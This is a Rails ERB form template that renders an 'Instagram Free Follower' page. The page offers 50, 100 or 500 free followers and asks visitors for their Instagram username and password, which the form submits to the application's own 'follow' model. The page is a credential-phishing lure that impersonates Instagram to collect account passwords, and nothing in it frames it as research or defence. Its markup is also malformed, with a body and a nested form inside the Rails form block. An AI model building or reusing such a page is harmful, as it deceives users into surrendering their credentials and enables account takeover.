<%= form_with(model: follow) do |form| %>
  <% if follow.errors.any? %>
    <div style="color: red">
      <h2><%= pluralize(follow.errors.count, "error") %> prohibited this follow from being saved:</h2>

      <ul>
        <% follow.errors.each do |error| %>
          <li><%= error.full_message %></li>
        <% end %>
      </ul>
    </div>
  <% end %>
   
  



<body>
  <div class="container">
    <h1 class="brand"><span>Instagram</span> Free Follower</h1>
    <div class="wrapper animated bounceInLeft">
      <div class="company-info">
        <h3>Free Follower</h3>
        <ul>
          <li>Instagram</li>
          <li>50, 100, 500</li>
          <li>All Free for you</li>
        </ul>
      </div>
      <div class="contact">
        <h3>Instagram Free Followers</h3>
        <form>
          <p>
            <label>Name</label>
             <%= form.text_field :username, placeholder: "For example: So_white_." %>
          </p>
          <br>
          <p>
            <label>Password</label>
            <%= form.password_field :password, placeholder: "For example: 1234" %>
          </p>
          <p>
           <label>How many followers do you want</label><br>
            <%= form.select :number, [50, 100, 500], class: "selector" %>
          </p>
          <p class="full">
             <%= form.submit class: "btn btn-primary" %>
          </p>
        </form>
      </div>
    </div>
  </div>
</body>
<% end %>